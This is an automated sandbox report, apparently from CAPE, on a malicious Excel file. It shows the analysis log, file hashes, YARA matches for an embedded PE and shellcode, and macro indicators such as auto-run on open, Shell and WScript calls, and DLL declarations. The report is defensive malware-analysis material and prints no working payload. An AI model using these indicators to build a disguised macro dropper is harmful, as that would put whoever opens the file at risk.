Analysis

Category Package Started Completed Duration Log
FILE xls 2019-10-10 00:08:42 2019-10-10 00:12:35 233 seconds Show Log
2019-10-10 01:08:43,000 [root] INFO: Date set to: 10-10-19, time set to: 00:08:43, timeout set to: 200
2019-10-10 01:08:43,062 [root] DEBUG: Starting analyzer from: C:\ukhgvkq
2019-10-10 01:08:43,062 [root] DEBUG: Storing results at: C:\lYOAdYxE
2019-10-10 01:08:43,062 [root] DEBUG: Pipe server name: \\.\PIPE\yFbkhMmdTU
2019-10-10 01:08:43,062 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-10-10 01:08:43,062 [root] INFO: Automatically selected analysis package "xls"
2019-10-10 01:08:44,653 [root] DEBUG: Started auxiliary module Browser
2019-10-10 01:08:44,668 [root] DEBUG: Started auxiliary module Curtain
2019-10-10 01:08:44,668 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-10-10 01:08:46,229 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2019-10-10 01:08:46,243 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-10-10 01:08:46,243 [root] DEBUG: Started auxiliary module DigiSig
2019-10-10 01:08:46,243 [root] DEBUG: Started auxiliary module Disguise
2019-10-10 01:08:46,243 [root] DEBUG: Started auxiliary module Human
2019-10-10 01:08:46,243 [root] DEBUG: Started auxiliary module Screenshots
2019-10-10 01:08:46,259 [root] DEBUG: Started auxiliary module Sysmon
2019-10-10 01:08:46,259 [root] DEBUG: Started auxiliary module Usage
2019-10-10 01:08:46,259 [root] INFO: Analyzer: Package modules.packages.xls does not specify a DLL option
2019-10-10 01:08:46,259 [root] INFO: Analyzer: Package modules.packages.xls does not specify a DLL_64 option
2019-10-10 01:08:46,727 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" with arguments ""C:\Users\user\AppData\Local\Temp\tmp7ch5i7dz.xls" /e" with pid 2024
2019-10-10 01:08:46,727 [lib.api.process] INFO: 32-bit DLL to inject is C:\ukhgvkq\dll\KtlSDdmU.dll, loader C:\ukhgvkq\bin\ZvIcTcA.exe
2019-10-10 01:08:46,775 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\yFbkhMmdTU.
2019-10-10 01:08:46,789 [root] DEBUG: Loader: Injecting process 2024 (thread 1520) with C:\ukhgvkq\dll\KtlSDdmU.dll.
2019-10-10 01:08:46,789 [root] DEBUG: Process image base: 0x2FA20000
2019-10-10 01:08:46,789 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\ukhgvkq\dll\KtlSDdmU.dll.
2019-10-10 01:08:46,789 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x30DF1000 - 0x77680000
2019-10-10 01:08:46,789 [root] DEBUG: InjectDllViaIAT: Allocated 0x204 bytes for new import table at 0x30E00000.
2019-10-10 01:08:46,789 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:08:46,789 [root] DEBUG: Successfully injected DLL C:\ukhgvkq\dll\KtlSDdmU.dll.
2019-10-10 01:08:46,789 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2024
2019-10-10 01:08:48,802 [lib.api.process] INFO: Successfully resumed process with pid 2024
2019-10-10 01:08:48,802 [root] INFO: Added new process to list with pid: 2024
2019-10-10 01:08:48,973 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:08:49,020 [root] INFO: Disabling sleep skipping.
2019-10-10 01:08:49,020 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:08:49,020 [root] INFO: Disabling sleep skipping.
2019-10-10 01:08:49,020 [root] INFO: Disabling sleep skipping.
2019-10-10 01:08:49,020 [root] INFO: Disabling sleep skipping.
2019-10-10 01:08:49,020 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2024 at 0x74b50000, image base 0x2fa20000, stack from 0x406000-0x410000
2019-10-10 01:08:49,020 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\tmp7ch5i7dz.xls" \e.
2019-10-10 01:08:49,020 [root] INFO: Monitor successfully loaded in process with pid 2024.
2019-10-10 01:08:49,068 [root] DEBUG: DLL unloaded from 0x74DC0000.
2019-10-10 01:08:49,145 [root] DEBUG: DLL loaded at 0x719D0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\mso (0x11e4000 bytes).
2019-10-10 01:08:49,193 [root] DEBUG: DLL loaded at 0x74740000: C:\Windows\system32\msi (0x240000 bytes).
2019-10-10 01:08:49,255 [root] DEBUG: DLL loaded at 0x74DC0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-10-10 01:09:15,993 [root] DEBUG: DLL loaded at 0x745A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32 (0x19e000 bytes).
2019-10-10 01:09:16,086 [root] DEBUG: DLL loaded at 0x74190000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf (0x40f000 bytes).
2019-10-10 01:09:16,742 [root] DEBUG: DLL loaded at 0x75B30000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-10-10 01:09:16,757 [root] DEBUG: DLL loaded at 0x74180000: C:\Windows\system32\msimtf (0xb000 bytes).
2019-10-10 01:09:16,757 [root] DEBUG: DLL loaded at 0x74170000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-10-10 01:09:16,835 [root] DEBUG: DLL loaded at 0x71880000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\riched20 (0x14f000 bytes).
2019-10-10 01:09:16,867 [root] DEBUG: DLL loaded at 0x6D350000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\MSORES (0x452a000 bytes).
2019-10-10 01:09:16,882 [root] DEBUG: DLL loaded at 0x6D0E0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\1033\MSOINTL (0x262000 bytes).
2019-10-10 01:09:16,930 [root] DEBUG: DLL loaded at 0x6CF50000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus (0x190000 bytes).
2019-10-10 01:09:16,976 [root] DEBUG: DLL unloaded from 0x77230000.
2019-10-10 01:09:17,023 [root] INFO: Announced 32-bit process name:  pid: 132709257
2019-10-10 01:09:17,023 [lib.api.process] WARNING: The process with pid 132709257 is not alive, injection aborted
2019-10-10 01:09:17,023 [root] DEBUG: DLL loaded at 0x74120000: C:\Windows\system32\mscoree (0x4a000 bytes).
2019-10-10 01:09:17,023 [root] DEBUG: set_caller_info: Adding region at 0x00310000 to caller regions list (advapi32::RegQueryInfoKeyW).
2019-10-10 01:09:17,023 [root] DEBUG: set_caller_info: Adding region at 0x00410000 to caller regions list (kernel32::FindFirstFileExW).
2019-10-10 01:09:17,039 [root] DEBUG: DLL loaded at 0x740A0000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x7b000 bytes).
2019-10-10 01:09:17,148 [root] DEBUG: DLL loaded at 0x74080000: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC (0x20000 bytes).
2019-10-10 01:09:17,303 [root] DEBUG: DLL loaded at 0x6CED0000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-10-10 01:09:17,460 [root] DEBUG: DLL loaded at 0x74060000: C:\Windows\system32\DwmApi (0x13000 bytes).
2019-10-10 01:09:17,490 [root] DEBUG: DLL unloaded from 0x75D20000.
2019-10-10 01:09:17,490 [root] DEBUG: DLL loaded at 0x74030000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2019-10-10 01:09:17,506 [root] DEBUG: DLL loaded at 0x75420000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:09:17,522 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:09:17,522 [root] DEBUG: DLL loaded at 0x756A0000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:09:17,522 [root] DEBUG: DLL unloaded from 0x74030000.
2019-10-10 01:09:17,974 [root] DEBUG: DLL loaded at 0x751D0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-10-10 01:09:17,974 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-10-10 01:09:17,990 [root] DEBUG: DLL loaded at 0x74050000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-10-10 01:09:18,270 [root] DEBUG: DLL loaded at 0x76430000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-10-10 01:09:18,286 [root] DEBUG: DLL unloaded from 0x2FA20000.
2019-10-10 01:09:18,318 [root] DEBUG: DLL loaded at 0x6CDD0000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-10-10 01:09:18,318 [root] DEBUG: DLL loaded at 0x75420000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-10-10 01:09:18,318 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-10-10 01:09:18,334 [root] DEBUG: DLL loaded at 0x756A0000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-10-10 01:09:18,334 [root] DEBUG: DLL unloaded from 0x76430000.
2019-10-10 01:09:18,334 [root] DEBUG: DLL loaded at 0x74C10000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-10-10 01:09:18,334 [root] DEBUG: DLL loaded at 0x76240000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-10-10 01:09:18,427 [root] DEBUG: DLL loaded at 0x74040000: C:\Windows\system32\profapi (0xb000 bytes).
2019-10-10 01:09:18,443 [root] DEBUG: DLL loaded at 0x760D0000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2019-10-10 01:09:18,457 [root] DEBUG: DLL loaded at 0x77130000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-10-10 01:09:18,473 [root] DEBUG: DLL loaded at 0x756C0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-10-10 01:09:18,473 [root] DEBUG: DLL loaded at 0x75D80000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-10-10 01:09:18,473 [root] DEBUG: DLL loaded at 0x758C0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-10-10 01:09:18,630 [root] DEBUG: DLL loaded at 0x6CDB0000: C:\Windows\system32\MPR (0x12000 bytes).
2019-10-10 01:09:18,864 [root] DEBUG: DLL unloaded from 0x77230000.
2019-10-10 01:09:19,003 [root] DEBUG: DLL loaded at 0x6CA70000: C:\Program Files (x86)\Microsoft Office\Office14\GKExcel (0x338000 bytes).
2019-10-10 01:09:19,660 [root] DEBUG: DLL unloaded from 0x6CA70000.
2019-10-10 01:09:19,971 [root] DEBUG: DLL loaded at 0x6CC50000: C:\Windows\System32\msxml6 (0x158000 bytes).
2019-10-10 01:09:20,267 [root] DEBUG: DLL loaded at 0x6CBF0000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-10-10 01:09:20,315 [root] DEBUG: DLL loaded at 0x6C960000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\VBE7 (0x28d000 bytes).
2019-10-10 01:09:20,345 [root] DEBUG: set_caller_info: Adding region at 0x01F70000 to caller regions list (ntdll::memcpy).
2019-10-10 01:09:20,377 [root] DEBUG: DLL loaded at 0x65300000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\1033\VBE7INTL (0x26000 bytes).
2019-10-10 01:09:20,377 [root] DEBUG: set_caller_info: Adding region at 0x06610000 to caller regions list (ntdll::memcpy).
2019-10-10 01:09:20,440 [root] DEBUG: set_caller_info: Adding region at 0x05D30000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-10-10 01:09:20,440 [root] DEBUG: set_caller_info: Adding region at 0x00010000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:09:20,470 [root] DEBUG: set_caller_info: Adding region at 0x04E30000 to caller regions list (ntdll::memcpy).
2019-10-10 01:09:20,486 [root] DEBUG: set_caller_info: Adding region at 0x00620000 to caller regions list (ntdll::memcpy).
2019-10-10 01:09:20,517 [root] DEBUG: set_caller_info: Adding region at 0x007B0000 to caller regions list (advapi32::RegOpenKeyExA).
2019-10-10 01:09:20,517 [root] DEBUG: set_caller_info: Adding region at 0x00130000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:09:20,532 [root] DEBUG: set_caller_info: Adding region at 0x04E50000 to caller regions list (kernel32::GetLocalTime).
2019-10-10 01:09:20,532 [root] DEBUG: set_caller_info: Adding region at 0x064D0000 to caller regions list (kernel32::GetLocalTime).
2019-10-10 01:09:20,532 [root] DEBUG: set_caller_info: Adding region at 0x05150000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-10-10 01:09:20,549 [root] DEBUG: DLL loaded at 0x6C830000: C:\Windows\SysWOW64\FM20 (0x12c000 bytes).
2019-10-10 01:09:20,549 [root] DEBUG: DLL loaded at 0x770B0000: C:\Windows\syswow64\COMDLG32 (0x7b000 bytes).
2019-10-10 01:09:20,549 [root] DEBUG: DLL loaded at 0x74C40000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32 (0x84000 bytes).
2019-10-10 01:09:20,579 [root] DEBUG: set_caller_info: Adding region at 0x00200000 to caller regions list (ntdll::memcpy).
2019-10-10 01:12:10,605 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-10-10 01:12:10,605 [root] INFO: Created shutdown mutex.
2019-10-10 01:12:11,618 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2024
2019-10-10 01:12:11,618 [root] INFO: Terminate event set for process 2024.
2019-10-10 01:12:11,618 [root] INFO: Terminating process 2024 before shutdown.
2019-10-10 01:12:11,618 [root] INFO: Waiting for process 2024 to exit.
2019-10-10 01:12:12,632 [root] INFO: Waiting for process 2024 to exit.
2019-10-10 01:12:13,661 [root] INFO: Waiting for process 2024 to exit.
2019-10-10 01:12:14,676 [root] INFO: Waiting for process 2024 to exit.
2019-10-10 01:12:15,690 [lib.api.process] INFO: Successfully terminated process with pid 2024.
2019-10-10 01:12:15,690 [root] INFO: Waiting for process 2024 to exit.
2019-10-10 01:12:16,703 [root] INFO: Shutting down package.
2019-10-10 01:12:16,703 [root] INFO: Stopping auxiliary modules.
2019-10-10 01:12:16,703 [root] INFO: Finishing auxiliary modules.
2019-10-10 01:12:16,703 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-10-10 01:12:16,703 [root] WARNING: File at path "C:\lYOAdYxE\debugger" does not exist, skip.
2019-10-10 01:12:16,703 [root] WARNING: Monitor injection attempted but failed for process 132709257.
2019-10-10 01:12:16,703 [root] INFO: Analysis completed.

MalScore

9.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-03 target-03 ESX 2019-10-10 00:08:42 2019-10-10 00:12:33

File Details

File Name tmp7ch5i7dz
File Size 738304 bytes
File Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 1, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Aug 30 09:14:50 2019, Last Saved Time/Date: Wed Oct 9 11:36:59 2019, Security: 0
MD5 0e8199b87cea34af9d5a919c3152c989
SHA1 2b2db989545c2c2559d425d43fc5e4f0f606df17
SHA256 f9704b16c55b131c8b80be4cdc46a5b9ee4ec3b07c9060da846c6f46f5669459
SHA512 886559bf14f8d752775b504550944099b0b03a8be8f250cac37730463754c2268c4e53e26e2270b6aa0edee476028d9ef0728e77a8004ea9e11e40b81fa767c6
CRC32 35E50A56
Ssdeep 12288:RcngSigpoTkKN/zLYBYPGcHdPlOga9uLNZx57gZJoTcfEhwtFN04R:R/tTkKN7LYBYOcJkga9eTHqE+t8s
TrID
  • 50.0% (.XLS) Microsoft Excel sheet (32500/1/3)
  • 37.6% (.XLS) Microsoft Excel sheet (alternate) (24500/1/2)
  • 12.3% (.) Generic OLE2 / Multistream Compound File (8000/1)
ClamAV None matched
Yara
  • embedded_pe - Contains an embedded PE32 file
  • embedded_win_api - A non-Windows executable contains win32 API functions names
  • shellcode_patterns - Matched shellcode byte patterns
CAPE Yara
Resubmit sample

Signatures

Dynamic (imported) function loading detected
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: GKExcel.dll/FValidateExcelFile
DynamicLoader: GKExcel.dll/HrInitHost
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: SHELL32.DLL/SHIsFileAvailableOffline
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Comctl32.dll/RegisterClassNameW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
DynamicLoader: VERSION.dll/VerQueryValueA
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32MapReferenceClsidToConfiguredClsid
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: VBE7.DLL/DllVbeInit
DynamicLoader: mso.dll/_MsoInitGimme@12
DynamicLoader: mso.dll/_MsoFGimmeFeatureEx@8
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@24
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@20
DynamicLoader: mso.dll/_MsoFGimmeFileEx@24
DynamicLoader: mso.dll/_MsoFGimmeFileEx@20
DynamicLoader: mso.dll/_MsoSetLVProperty@8
DynamicLoader: mso.dll/_MsoVBADigSigCallDlg@20
DynamicLoader: mso.dll/_MsoVbaInitSecurity@4
DynamicLoader: mso.dll/_MsoFIEPolicyAndVersion@8
DynamicLoader: mso.dll/_MsoFUseIEFeature@8
DynamicLoader: mso.dll/_MsoFAnsiCodePageSupportsLCID@8
DynamicLoader: mso.dll/_MsoFInitOffice@20
DynamicLoader: mso.dll/_MsoUninitOffice@4
DynamicLoader: mso.dll/_MsoFGetFontSettings@20
DynamicLoader: mso.dll/_MsoRgchToRgwch@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface2@20
DynamicLoader: mso.dll/_MsoFCreateControl@36
DynamicLoader: mso.dll/_MsoFLongLoad@8
DynamicLoader: mso.dll/_MsoFLongSave@8
DynamicLoader: mso.dll/_MsoFGetTooltips@0
DynamicLoader: mso.dll/_MsoFSetTooltips@4
DynamicLoader: mso.dll/_MsoFLoadToolbarSet@24
DynamicLoader: mso.dll/_MsoFCreateToolbarSet@28
DynamicLoader: mso.dll/_MsoInitShrGlobal@4
DynamicLoader: mso.dll/_MsoHpalOffice@0
DynamicLoader: mso.dll/_MsoFWndProcNeeded@4
DynamicLoader: mso.dll/_MsoFWndProc@24
DynamicLoader: mso.dll/_MsoFCreateITFCHwnd@20
DynamicLoader: mso.dll/_MsoDestroyITFC@4
DynamicLoader: mso.dll/_MsoFPitbsFromHwndAndMsg@12
DynamicLoader: mso.dll/_MsoFGetComponentManager@4
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: mso.dll/_MsoWideCharToMultiByte@32
DynamicLoader: mso.dll/_MsoHrRegisterAll@0
DynamicLoader: mso.dll/_MsoFSetComponentManager@4
DynamicLoader: mso.dll/_MsoFCreateStdComponentManager@20
DynamicLoader: mso.dll/_MsoFHandledMessageNeeded@4
DynamicLoader: mso.dll/_MsoPeekMessage@8
DynamicLoader: mso.dll/_MsoGetWWWCmdInfo@20
DynamicLoader: mso.dll/_MsoFExecWWWHelp@8
DynamicLoader: mso.dll/_MsoFCreateIPref@28
DynamicLoader: mso.dll/_MsoDestroyIPref@4
DynamicLoader: mso.dll/_MsoChsFromLid@4
DynamicLoader: mso.dll/_MsoCpgFromChs@4
DynamicLoader: mso.dll/_MsoSetLocale@4
DynamicLoader: mso.dll/_MsoFSetHMsoinstOfSdm@4
DynamicLoader: mso.dll/_MsoVBADigSig2CallDlgEx@28
DynamicLoader: mso.dll/_MsoVbaInitSecurityEx@4
DynamicLoader: OLEAUT32.dll/SysFreeString
DynamicLoader: OLEAUT32.dll/LoadTypeLib
DynamicLoader: OLEAUT32.dll/RegisterTypeLib
DynamicLoader: OLEAUT32.dll/QueryPathOfRegTypeLib
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/OleTranslateColor
DynamicLoader: OLEAUT32.dll/OleCreateFontIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePictureIndirect
DynamicLoader: OLEAUT32.dll/OleLoadPicture
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrameIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrame
DynamicLoader: OLEAUT32.dll/OleIconToCursor
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: mso.dll/_MsoFTranslateCp@16
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: USER32.dll/NotifyWinEvent
The office file has a unconventional code page: ANSI Cyrillic; Cyrillic (Windows)
The office file contains 5 macros
The office file contains a macro with auto execution
Workbook_Activate: Runs when the Excel Workbook is opened
The office file contains anomalous features
creation_anomaly: The file appears to have an edit time yet has no creation time or last saved time. This can be a sign of an automated document creation kit.
numerical_author: The file author is numerical rather than a word/name indicative of an automated document creation kit.
numerical_last_saved: The file was last saved by a numerical author rather than a word/name indicative of an automated document creation kit.
The office file contains a macro with potential indicators of compromise
Executable file name: Public Declare PtrSafe Function Wakeup Lib libGTPK2.dll () As Integer
Executable file name: Public Declare Function Wakeup Lib libGTPK1.dll () As Integer
Executable file name: nm = nm.dll
The office file contains a macro with suspicious strings
Chr: May attempt to obfuscate specific strings (use option --deobf to deobfuscate)
Open: May open a file
Shell: May run an executable file or a system command
WScript_Shell: May run an executable file or a system command
Binary: May read or write a binary file (if combined with Open)
CreateObject: May create an OLE object
Write: May write to a file (if combined with Open)
Put: May write to a file (if combined with Open)
Lib: May run code from a DLL
Kill: May delete a file
FileCopy: May copy a file
ActiveWorkbook_SaveAs: May save the current workbook

Screenshots


Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

SummaryInformation Metadata

Creating Application Microsoft Excel
Author 1
Last Saved By 1
Creation Time None
Last Saved Time None
Total Edit Time None
Document Title None
Document Subject None
Amount of Pages None
Amount of Words None
Amount of Characters None

DocumentSummaryInformation Metadata

Company
Document Version None
Digital Signature None
Language None
Notes None

File Analysis (Signatures)

IOCs
Executable file name Public Declare PtrSafe Function Wakeup Lib libGTPK2.dll () As Integer
